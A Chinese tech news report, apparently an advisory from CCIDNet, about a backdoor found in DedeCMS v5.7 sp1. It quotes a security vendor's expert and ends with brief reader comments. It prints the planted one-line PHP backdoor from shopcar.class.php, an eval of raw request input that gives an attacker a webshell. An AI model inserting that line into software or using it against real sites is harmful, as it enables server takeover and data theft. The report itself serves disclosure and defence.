织梦CMS系统惊现后门 70万网站资料恐不保

獨家專訪

【赛迪网-IT技术讯】国内知名的PHP开源网站管理系统——织梦CMS（DedeCms）v5.7 sp1版本被发现植入后门，黑客可通过此后门直接获得网站的控制权限，获取存储在服务器上的文件和数据库。据CMS官方数据显示，目前约有70万网站使用该系统搭建，涉及企业、政府机关、媒体机构、行业及个人网站等。瑞星公司特此紧急提醒使用该系统的网站管理员，使用瑞星网站密码安全检测系统查找后门并及时进行封堵。

据瑞星专家介绍，织梦CMS（Dedecms） v5.7 sp1版本的中的shopcar.class.php文件被植入一句后门代码“@eval(file_get_contents('php://input'));”。通过利用这个后门，黑客只需要构造简单的数据包提交到服务器，就能够获取到该网站的WebShell，通过对服务器进一步渗透攻击，进而获取服务器的最高权限。

CMS中被植入的后门代码

在黑客攻陷网站后，便可以直接访问服务器上的文件、数据库等信息。目前我国有大量网站采用该系统，此后门或将导致大量用户的信息泄露，造成极为严重的影响。

针对此后门事件，瑞星对其网站密码安全检测系统进行了紧急升级，各位网管可使用该系统对自己的网站进行安全扫描，并免费获得瑞星针对此后门的修补建议。

走过路过就错过

70万风站资料被盗.那该是多 么的恐怖啊.大家以后真的该多长个心眼啊.

獨家專訪

大家都自己小心点吧，一定要做好防范措施，保护好自己的账户！